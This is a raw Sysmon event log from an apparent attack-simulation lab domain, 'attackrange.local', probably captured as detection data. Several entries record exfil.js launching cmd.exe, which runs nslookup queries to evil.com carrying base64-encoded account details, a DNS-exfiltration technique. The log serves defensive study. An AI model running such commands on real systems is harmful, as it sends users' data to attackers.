14:16:38.714{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-4741-000000005F02}5860C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.699{2E1864BB-17C6-629A-4741-000000005F02}58607508C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-4641-000000005F02}5012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.699{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4741-000000005F02}5860C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.683{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.683{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.683{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.683{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.683{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4641-000000005F02}5012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000202431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.683{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DA299702C751BAD37669E29413FAA42,SHA256=39DA786F72AE7B4E6E962D3AB1897CC0AED16A7476B3F38635C117F53E36D7C3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.683{2E1864BB-17A1-629A-783D-000000005F02}55524780C:\Windows\System32\WScript.exe{2E1864BB-17C6-629A-4641-000000005F02}5012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.690{2E1864BB-17C6-629A-4641-000000005F02}5012C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqjru.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.683{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C4ABEF0C166CED7D983CC4EF36B93E1A,SHA256=456F1130EA20B7DBE49A8D9916AA2BE5C696AB36454896E50E47708E55BFCFA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000202427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.683{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyjka.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.652{2E1864BB-17C6-629A-4441-000000005F02}59887320C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-4541-000000005F02}2060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.652{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.652{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.652{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.652{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.652{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4541-000000005F02}2060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.652{2E1864BB-17C6-629A-4341-000000005F02}62087940C:\Windows\system32\cmd.exe{2E1864BB-17C6-629A-4541-000000005F02}2060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.660{2E1864BB-17C6-629A-4541-000000005F02}2060C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C6-629A-4341-000000005F02}6208C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyjka.tmp 2>&1 10341000x8000000000000000202418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.636{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-4441-000000005F02}5988C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.636{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-4441-000000005F02}5988C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.636{2E1864BB-17C6-629A-4441-000000005F02}59887320C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-4341-000000005F02}6208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.615{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4441-000000005F02}5988C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.615{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.615{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.615{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.615{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.615{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4341-000000005F02}6208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.615{2E1864BB-17A1-629A-783D-000000005F02}55523140C:\Windows\System32\WScript.exe{2E1864BB-17C6-629A-4341-000000005F02}6208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.622{2E1864BB-17C6-629A-4341-000000005F02}6208C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyjka.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000202407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 